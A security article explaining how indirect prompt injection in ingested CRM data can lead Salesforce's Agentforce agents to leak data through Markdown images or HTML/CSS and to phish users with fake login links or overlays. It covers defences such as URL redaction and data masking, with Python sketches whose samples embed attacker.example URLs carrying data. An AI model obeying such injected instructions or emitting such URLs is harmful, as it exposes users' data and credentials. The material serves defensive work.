One key way Salesforce mitigates AI risk

Agentforce, Salesforce's agentic AI, faces data exfiltration and phishing threats stemming from indirect prompt injection; we detail how it mitigates this risk.

What is Agentforce, and what risks does it face?

Agentforce is Salesforce's agentic AI layer. Its agents read CRM records, draft communications, and take actions, returning generated output to users inside the Salesforce web app.

Because those agents act on data they ingest (for example, Web-to-Lead submissions), an attacker who places an indirect prompt injection in that data can manipulate the agent's output to attempt several well-known attacks:

The first three attacks described above share a key characteristic: an attacker-controlled URL surviving into the agent's rendered output.

The defense: URL redaction

When an agent's response is rendered inside the Salesforce web app, any URL not demarcated as a trusted URL is stripped from the output and replaced with the literal string [URL_REDACTED]. Because Markdown-based and HTML-based data exfiltration attacks rely on untrusted URLs reaching rendered output, redacting those URLs substantially reduces the attack surface.
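The redaction rule described above can be sketched in a few lines. This is a minimal illustration, not Salesforce's implementation: the function name `redact_untrusted_urls`, the `TRUSTED_HOSTS` set, and the simplified URL pattern are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist standing in for the org's trusted URLs.
TRUSTED_HOSTS = {"example.my.salesforce.com"}

# Simplified matcher: an http(s) scheme followed by characters that are not
# whitespace or common Markdown/HTML delimiters.
URL_PATTERN = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)


def _is_trusted(url: str, trusted_hosts: set[str]) -> bool:
    """Return True only when the URL parses and its host is on the allowlist."""
    try:
        host = urlsplit(url).hostname or ""
    except ValueError:
        # Malformed URLs are treated as untrusted.
        return False
    return host in trusted_hosts


def redact_untrusted_urls(text: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> str:
    """Replace every URL whose host is not trusted with [URL_REDACTED]."""
    def _replace(match: re.Match) -> str:
        url = match.group(0)
        return url if _is_trusted(url, trusted_hosts) else "[URL_REDACTED]"

    return URL_PATTERN.sub(_replace, text)


print(redact_untrusted_urls("![status](https://attacker.example/p?d=secret)"))
```

The check compares the parsed hostname rather than searching for a trusted substring, so a URL such as `https://example.my.salesforce.com.attacker.example/` is still redacted in this sketch.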

How redaction addresses risks

| Attack | How Redacting URLs Mitigates It |
| --- | --- |
| Data exfiltration via markdown image: The agent emits a markdown image whose URL carries stolen data to an attacker-controlled server, firing on render. | The untrusted image URL is replaced with [URL_REDACTED], so the browser never makes the request that leaks the data. |
| Phishing via markdown link: A 'click to reauthenticate' link carries data out or points the user to a fake login. | The clickable link is replaced with [URL_REDACTED], so there is nothing for the user to click. |
| Data exfiltration via HTML/CSS: An image, iframe, or CSS background in agent-output HTML points at an attacker-controlled domain, firing a request on render. | URLs inside HTML and CSS are redacted too: the attacker-controlled image, iframe, or background source is replaced with [URL_REDACTED] before the markup renders, so the request that would carry the data out is never made. |
| Phishing via HTML overlay: Injected markup draws an attacker-controlled login screen over the chat to harvest credentials. | The fake login screen has to load attacker-hosted content. With those URLs redacted, it has nothing to load. |
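To make the "firing on render" distinction concrete, the sketch below lists the URLs in a piece of agent output that a browser would request automatically, without any user click. The channel names, the regular expressions, and the function `render_time_urls` are assumptions chosen for illustration; a production renderer would use real Markdown and HTML parsers rather than patterns like these.

```python
import re

# Each pattern captures the URL in one context a browser fetches on render.
RENDER_TIME_PATTERNS = {
    # Markdown image: ![alt](url)
    "markdown_image": re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)"),
    # HTML src attribute, e.g. <img src="..."> or <iframe src="...">
    "html_src": re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE),
    # CSS url(...) value, e.g. background: url('...')
    "css_url": re.compile(r"\burl\(\s*[\"']?([^\"')\s]+)", re.IGNORECASE),
}


def render_time_urls(agent_output: str) -> list[tuple[str, str]]:
    """Return (channel, url) pairs for URLs that would load without a click."""
    found = []
    for channel, pattern in RENDER_TIME_PATTERNS.items():
        for match in pattern.finditer(agent_output):
            found.append((channel, match.group(1)))
    return found


sample = (
    "![s](https://attacker.example/i.png?d=abc) "
    '<iframe src="https://attacker.example/f"></iframe> '
    "<div style=\"background:url('https://attacker.example/bg')\"></div>"
)
for channel, url in render_time_urls(sample):
    print(channel, url)
```

A plain Markdown link such as `[click](https://attacker.example/login)` is not reported here, since it needs a user click; that is the phishing case in the table rather than the render-time exfiltration case.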

This analysis describes Agentforce Chat inside the Salesforce web app. Salesforce ships many more AI features, exposes MCP servers, and presents a large attack surface overall, so URL redaction addresses only a subset of the risk. For example, the agent's ability to call tools in Agentforce requires other defenses, such as human-in-the-loop approval, to prevent attacks like the exploit against Microsoft Copilot Cowork.

Configurations for Salesforce AI output processing

Some use cases require certain URLs to appear in model output. To allow specific URLs, configure the following:

Restrict and allowlist output URLs. To allow agents to output external URLs, add each one explicitly:

Setup → Quick Find → "Trusted URLs" → Trusted URLs → New Trusted URL

  • Avoid wildcard patterns that allow any site hosting user-generated or otherwise untrusted content.

  • In the CSP directives on the same settings page, leave img-src disallowed for a trusted URL unless images are meant to render from that domain. This reduces the risk of Markdown image-based data exfiltration.
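The wildcard advice above lends itself to a quick review script. The following is a rough sketch under stated assumptions: it assumes trusted URL entries are available as plain strings with an optional scheme and a leading `*` wildcard, and the function name `risky_trusted_url_patterns` and the short `USER_CONTENT_SUFFIXES` list are illustrative, not exhaustive and not part of any Salesforce API.

```python
# Illustrative examples of domains where third parties can host their own content.
USER_CONTENT_SUFFIXES = ("github.io", "s3.amazonaws.com", "blob.core.windows.net")


def _hosts_user_content(base: str) -> bool:
    """True when base equals, or is a subdomain of, a listed suffix."""
    return any(base == s or base.endswith("." + s) for s in USER_CONTENT_SUFFIXES)


def risky_trusted_url_patterns(patterns: list[str]) -> list[str]:
    """Return the wildcard patterns that deserve a closer look."""
    risky = []
    for pattern in patterns:
        # Drop an optional scheme and any path, keeping only the host part.
        host = pattern.split("://", 1)[-1].split("/", 1)[0].lower()
        if not host.startswith("*"):
            continue  # Explicit hosts are outside the scope of this check.
        base = host.lstrip("*.")
        # Flag bare wildcards, whole-TLD wildcards, and user-content domains.
        if base == "" or "." not in base or _hosts_user_content(base):
            risky.append(pattern)
    return risky


entries = [
    "https://docs.example.com",
    "*.example.com",
    "*.github.io",
    "*",
    "https://*.s3.amazonaws.com",
]
print(risky_trusted_url_patterns(entries))
```

A pattern such as `*.example.com` passes this check only because the sketch cannot know what that domain hosts; whether a given domain serves untrusted content still needs a human decision.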

Next, we note several Salesforce settings that reduce the risk surface for indirect prompt injection:

Mask sensitive data in the Einstein Trust Layer.

Masking data works by substituting sensitive data with a placeholder before a prompt is sent to the LLM. This prevents the agent, under the influence of a prompt injection, from taking actions such as encoding sensitive data and appending the encoded result to a malicious URL.
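The placeholder substitution can be illustrated with a small sketch. It is not the Einstein Trust Layer's implementation: the two regular expressions, the placeholder format, and the function name `mask_prompt` are assumptions made for this example, and real detectors are considerably more thorough.

```python
import re

# Hypothetical, simplified detectors for two of the data types.
PATTERNS = {
    "EMAIL": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "US_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def mask_prompt(prompt: str) -> tuple[str, dict[str, str]]:
    """Swap sensitive values for placeholders before the prompt reaches the LLM.

    Returns the masked prompt and a placeholder-to-value mapping that stays
    on the caller's side and is never sent to the model.
    """
    mapping: dict[str, str] = {}
    counters: dict[str, int] = {}

    def make_replacer(label: str):
        def _replace(match: re.Match) -> str:
            value = match.group(0)
            # Reuse the same placeholder when a value repeats.
            for placeholder, original in mapping.items():
                if original == value:
                    return placeholder
            counters[label] = counters.get(label, 0) + 1
            placeholder = f"[{label}_{counters[label]}]"
            mapping[placeholder] = value
            return placeholder
        return _replace

    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(make_replacer(label), prompt)
    return prompt, mapping


masked, mapping = mask_prompt("Contact jane@example.com, SSN 123-45-6789, cc jane@example.com")
print(masked)
```

Because the model only ever sees the placeholders, an injected instruction to encode the SSN into a URL has nothing but `[US_SSN_1]` to work with.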

Configure data masking here:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Data Masking → Large Language Model Data Masking

Turn on Large Language Model Data Masking first; it is the parent category, and the options below are only applicable once it is on.

Pattern-based masking is available and can be enabled for the following data types: Name, Email Address, Phone Number, Credit Card, US SSN, US ITIN, US Drivers License, Passport, IBAN Code, and Company Name.

Data Masking → Pattern-based → Sensitive Data

Field-based masking covers fields by compliance category (PII, HIPAA, GDPR, PCI, COPPA, and CCPA) and by data sensitivity level (Public, Internal, Confidential, Restricted, and Mission Critical).

Data Masking → Field-based → Compliance Categories / Data Sensitivity Levels
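Field-based masking differs from pattern-based masking in that the decision comes from field metadata rather than from the value itself. A minimal sketch of that idea follows; the `FieldMeta` class, the field names, and the placeholder format are hypothetical and are not drawn from Salesforce's data model.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class FieldMeta:
    """Hypothetical classification attached to a field."""
    compliance: frozenset = frozenset()  # e.g. {"PII", "HIPAA"}
    sensitivity: str = "Public"          # e.g. "Confidential"


def mask_record(record: dict, metadata: dict, masked_categories: set, masked_levels: set) -> dict:
    """Mask a field when its category or sensitivity level is selected for masking."""
    masked = {}
    for name, value in record.items():
        meta = metadata.get(name, FieldMeta())
        if meta.compliance & masked_categories or meta.sensitivity in masked_levels:
            masked[name] = f"[{name.upper()}_MASKED]"
        else:
            masked[name] = value
    return masked


metadata = {
    "diagnosis": FieldMeta(compliance=frozenset({"HIPAA"}), sensitivity="Restricted"),
    "salary": FieldMeta(sensitivity="Confidential"),
}
record = {"company": "Acme", "diagnosis": "asthma", "salary": "100000"}
print(mask_record(record, metadata, masked_categories={"HIPAA"}, masked_levels={"Confidential"}))
```

In this sketch, a field with no metadata defaults to Public and passes through unmasked, which is why accurate field classification matters before relying on this setting.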

Prompt injection detection (beta)

Salesforce additionally offers a prompt injection detection setting:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Safety & Security → Prompt Injection Detection

However, this setting is currently in beta and subject to beta terms, under which Salesforce appears to train AI on customer data when prompt injection detection is enabled.
